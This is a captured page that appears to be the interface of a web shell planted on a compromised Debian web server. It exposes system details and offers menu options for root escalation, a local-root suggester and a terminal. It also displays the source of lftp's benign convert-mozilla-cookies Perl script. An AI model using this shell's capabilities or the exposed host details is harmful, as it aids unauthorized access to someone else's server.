Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
lftp /
Delete
Unzip
Name
Size
Permission
Date
Action
convert-mozilla-cookies
1.74
KB
-rwxr-xr-x
2022-07-27 00:33
import-ncftp
621
B
-rwxr-xr-x
2022-07-27 00:33
import-netscape
857
B
-rwxr-xr-x
2022-07-27 00:33
verify-file
2.98
KB
-rwxr-xr-x
2022-07-27 00:33
xdg-move
789
B
-rwxr-xr-x
2022-07-27 00:33
Save
Rename
#!/usr/bin/perl # Copyright (c) 2001,2005,2007,2010 Alexander V. Lukyanov <lav@yars.free.net> # See COPYING file (GNU GPL) for complete license. # This script converts mozilla-style cookies to lftp set commands. use strict; use DBI; my $file=$ARGV[0] if defined $ARGV[0]; $file=qx{ ls -t \$HOME/.netscape/cookies \\ `find \$HOME/.mozilla -name cookies.txt -or -name cookies.sqlite` | head -1 },chomp $file if !defined $file; print "# converted from $file\n"; my %cookie; sub add_cookie($$$$$) { my ($domain,$path,$secure_bool,$name,$value)=@_; for($domain,$path,$name,$value) { s/"/\\"/g; s/'/\\'/g; s/ /%20/g; } my $secure=''; $secure=';secure' if $secure_bool eq 'TRUE' || $secure_bool eq '1'; $domain="*$domain" if $domain =~ /^\./; $path='' if $path eq '/'; $path=";path=$path" if $path ne ''; $value="=$value" if $name ne ''; $cookie{"$domain$path$secure"}.=" $name$value"; } if($file=~/\.sqlite$/) { my $file1="$file.$$.tmp"; $SIG{__DIE__}=sub { unlink $file1 }; system('cp',$file,$file1); my $dbh=DBI->connect("dbi:SQLite:dbname=$file1",'',''); unlink $file1; my $q=$dbh->prepare("select host,path,isSecure,name,value from moz_cookies"); $q->execute; $q->bind_columns(\my($domain,$path,$secure_bool,$name,$value)); while($q->fetch) { add_cookie($domain,$path,$secure_bool,$name,$value); } } else { open COOKIES,'<',$file or die "open($file): $!"; while(<COOKIES>) { chomp; next if /^#/ or /^$/; my ($domain,undef,$path,$secure_bool,$expires,$name,$value)=split /\t/; add_cookie($domain,$path,$secure_bool,$name,$value); } } foreach(sort keys %cookie) { $cookie{$_}=~s/^ //; my $c=($_=~/;/?qq{"$_"}:$_); print qq{set http:cookie/$c "$cookie{$_}"\n}; }